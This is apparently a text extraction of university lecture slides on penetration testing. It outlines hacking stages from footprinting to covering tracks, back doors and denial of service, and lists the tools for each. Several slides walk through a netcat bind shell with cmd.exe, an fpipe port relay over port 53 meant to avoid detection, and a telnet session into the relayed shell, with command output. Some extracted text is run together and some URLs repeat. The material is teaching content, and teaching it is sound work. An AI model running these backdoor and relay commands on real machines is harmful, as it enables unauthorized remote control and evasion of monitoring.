Penetrate Test

8/14/2019 Penetrate Test

1/26

1cs591 chow

C. Edward Chow

Penetrate Testing


2/26

2cs591 chow

Outline of The Talk

Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References:

CORE IMPACT - Penetration Testing: Assessing Your Overall

Security Before Attackers Do Pages 165,277 Security in Computing. Hack I.T, Security Through Penetration Testing, by T.J.

Klevinksy, Scott Laliberte, Ajay Gupta.

http://www.hackingexposed.com/win2k/links.html
http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007


3/26

3cs591 chow

Definition

Vulnerability (Security Flaw):specific failure of the system to guard againstunauthorized access or actions. It can be procedures, technology (SW orHW), or management.

Using the failure of the system to violate the site security policy is calledexploiting the vulnerability

Penetration Studyis a test for evaluating the strengths of all security

controls on the computer system. It intends to find all possible securityholes and provides suggestions for fixing them. Penetration Testingis an authorized attempt to violate specific constraints

stated in the form of a security or integrity policy. Penetration Testingis a testing technique for discovering, understanding,

and documenting all the security holes that can be found in a system. It is not a proof techniques. It can never prove the absence of security

flaws. It can only prove their presence. Example goals of penetration studies are gaining of read or write access to

specific objects, files, or accounts; gaining of specific privileges; anddisruption or denial of the availability of objects.

What is the difference between penetration testing and hacking/intrusion?


4/26

4cs591 chow

More Thorough Penetration Study

A more thorough penetration study is to find the properinterpretation of vulnerabilities found, draw conclusionon the care taken in the design and implementation.

A simple list of vulnerabilities , although helpful inclosing those specific holes, contribute far less to thesecurity of a system.

In practice, constrains (resource, money, time) affect thepenetration study


5/26

5cs591 chow

Hacking

Methodology

(Steps)

An excellentdescriptioninside of theback cover

page ofHacking

Exposed

text by

McClure etal.

Scanning

Footprinting

Enumeration

Gaining Access

Escalating Privilege

Pilferting

Covering TracksCreating Back Doors

Denial of Service

whois nslookup

Nmap fping

dumpACL showmountlegion rpcinfo

Tcpdump LophtcrackNAT

Johntheripper getadminRhosts userdata

Config files registryzap rootkits

Cron at startup foldernetcat keystroke logger

remote desktopSynk4 ping of death

tfn/stacheldraht


6/26

6cs591 chow

Footprinting

Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range

Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a surgical attack. The key here is not to miss any details.

Note that for penetration tester, this step is to avoiding testing othersinstead of your client and to include all systems to be tested (sometime theorganization will not tell you what their systems consist of).

Defense: deploy NIDS (snort), RotoRouter

Techniques Open Sourcesearch

Find domain name,admin, IP addresses

name servers

DNS zonetransfer

Tools Google, searchengine, Edgar

Whois

(Network solution;arin)

Nslookup (lsd)digSam Spade
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22http://www.sec.gov/cgi-bin/srch-edgarhttp://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=dohttp://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://www.samspade.org/ssw/http://www.samspade.org/ssw/http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0http://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=dohttp://www.sec.gov/cgi-bin/srch-edgarhttp://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22


7/26

7cs591 chow

Scanning

Bulk Target assessment Which machine is up and what ports (services) are open

Focus on most promising avenues of entry.

To avoid being detect, these tools can reduce frequency of packetsending and randomize the ports or IP addresses to be scanned inthe sequence.

Note that some machine does not respond to ping but responds torequests to ports that actually open. Ardor is an example.

Techniques Ping sweep TCP/UDP port

scan

OS detection

Tools Fping, icmpenumWS_Ping ProPack

nmap

NmapSuperscan

fscan

Nmapqueso

siphon
http://www.fping.com/download/http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://www.fping.com/download/


8/26

8cs591 chow

Enumeration

Identify valid user accounts or poorly protected resource shares.

Most intrusive probing than scanning step.

Techniques list useraccounts

list file shares identifyapplications

Tools Null sessions

DumpACL

Sid2usre

onSiteAdmin

Showmount

NAT

legion

Banner grabingwith telnet ornetcat, rpcinfo
http://rng.r2.ru/download.htmhttp://www.atstake.com/research/tools/network_utilities/http://www.atstake.com/research/tools/network_utilities/http://rng.r2.ru/download.htm


9/26

9cs591 chow

Gaining Access

Based on the information gathered so far, make an informedattempted to access the target.

Techniques

Passwordeavesdropping

File sharebrute forcing

Password

File grab

Bufferoverflow

Tools Tcpdump/ssldumpL0phtcrackreadsmb

NATlegion

TftpPwddump2(NT)

Ttdb, bindIIS.HTR/ISM.DLL


10/26

10cs591 chow

Escalating Privilege

If only user-level access was obtained in the last step, seek togain complete control of the system.

Techniques Password cracking Known Exploits

Tools John the ripperL0phtcrack

Lc_messages,

Getadmin,sechole


11/26


12/26

12cs591 chow

Covering Tracks

Once total ownership of the target is secured, hiding this fact fromsystem administrators become paramount, less they quickly endthe romp.

Techniques Clear Logs Hide tools

Tools Zap, Event Log GUI Rootkitsfile streaming


13/26

13cs591 chow

Creating Back Doors

Trap doors will be laid in various parts of the system to ensure thatprivilege access is easily regained whenever the intruder decides.

Techniques Create rogueuser accounts

Schedule batchjobs

Infect startup files

Tools Members ofwheel, admin

Cron, AT rc, startup folder,registry keys

Techniques Plant remotecontrol services

Install monitoringmechanisms

Replace appls withTrojans

Tools Netcat,remote.exe

VNC, B02Kremote desktop

Keystroke loggers,add acct. tosecadmin mailaliases

Login, fpnwcint.dll


14/26

14cs591 chow

Denial of Services

If atacker is unsuccessful in gaining access, they may use readilyavailable exploit code to disable a target as a last resort.

Techniques Syn flood ICMP techniques Identical src/dstSYN requests

Tools synk4 Ping to deathsmurf

LandLatierra

Techniques Overlappingfragment/offsetbugs

Out of bounds TCPoptions (OOB)

DDoS

Tools Netcat,remote.exe

VNC, B02Kremote desktop

Keystroke loggers,add acct. tosecadmin mailaliases

Trinoo

TFNstacheldraht
http://staff.washington.edu/dittrich/misc/trinoo.analysishttp://www.networkcomputing.com/1201/1201f1c1.htmlhttp://www.anml.iu.edu/ddos/tools.htmlhttp://www.anml.iu.edu/ddos/tools.htmlhttp://www.networkcomputing.com/1201/1201f1c1.htmlhttp://staff.washington.edu/dittrich/misc/trinoo.analysis


15/26

15cs591 chow

Nessus: Integrated Security Scanning

Tool

Originally designed by Renaud Deraison

Available at www.nessus.org

Main scanning engine running on Unix server with client

GUI running on Unix or Windows. Pretty good control and reporting.

Include a script language for plug-in (detectingadditional attacks).

http://www.nessus.org/pres/bh2001/index.html
mailto:[email protected]://www.nessus.org/http://www.nessus.org/mailto:[email protected]


16/26

16cs591 chow


17/26

17cs591 chow


18/26

18cs591 chow


19/26

19cs591 chow


20/26

20cs591 chow


21/26

21cs591 chow


22/26

22cs591 chow

Setting up Backdoor Connection

Once obtain the admin privilege, you install tools thatallow you to run command remotely (e.g. netcat) or usethe machine as a stepping stone for relaying orredirecting the msg (fpipe)

Port redirection accepts packet from one port and sendit over another port. It can be used to avoid packet filterfirewall.

We will use netcat and fpipe to illustrate the concept.

Netcat is available athttp://www.atstake.com/research/tools/network_utilities/

Fpipe is available at http://www.foundstone.com
http://www.foundstone.com/http://www.foundstone.com/


23/26

23cs591 chow

Setup Netcat

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -ecmd.exe -p 80 -s 128.198.177.63

Hacker runs the nc command on the victim machine, which listensto the command sent in from port 80, use cmd.exe to run thecommand and redirect the console output as http response back.

listening on [128.198.177.63] 80 ...

connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on[128.198.177.63] 80 ...

connect to [128.198.177.63] from VIVIAN.eas.uccs.edu

Here we bind in front of port 80. You can also use port 139. Theidea is used known port to avoid detection.

-L is used to repeat previous command after connection isterminated.

The nc command will receive command from packet to port 80, and

run it with cmd.exe and send back execution result.


24/26

24cs591 chow

Setup FPIPE

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.

This is run the infected machine which serves as relay. Use port 53 forlisten to Internet connection, relay any msg from port 53 to machinewith 128.198.177.63 and port 80.

Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com

Pipe connected: In: 128.198.162.60:58797 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80

Here the fpipe program listens to packet incoming from blanca to port

53, relay it over to 128.198.177.63 using port 53 (DNS) to avoiddetection.


25/26

25cs591 chow

Telnet to the relay host

C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00

Directory of C:\work\cucs\cs522\project

04/29/2003 12:56 PM . 04/29/2003 12:56 PM .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps

Note that it is the console output of 128.198.177.63 machine being shown here.


26/26

26cs591 chow

Layering of Tests

1. External attacker with no knowledge of the system.

2. External attacker with access to the system.

3. Internal attacker with access to the system.

Penetrate Test

Documents

Transcript of Penetrate Test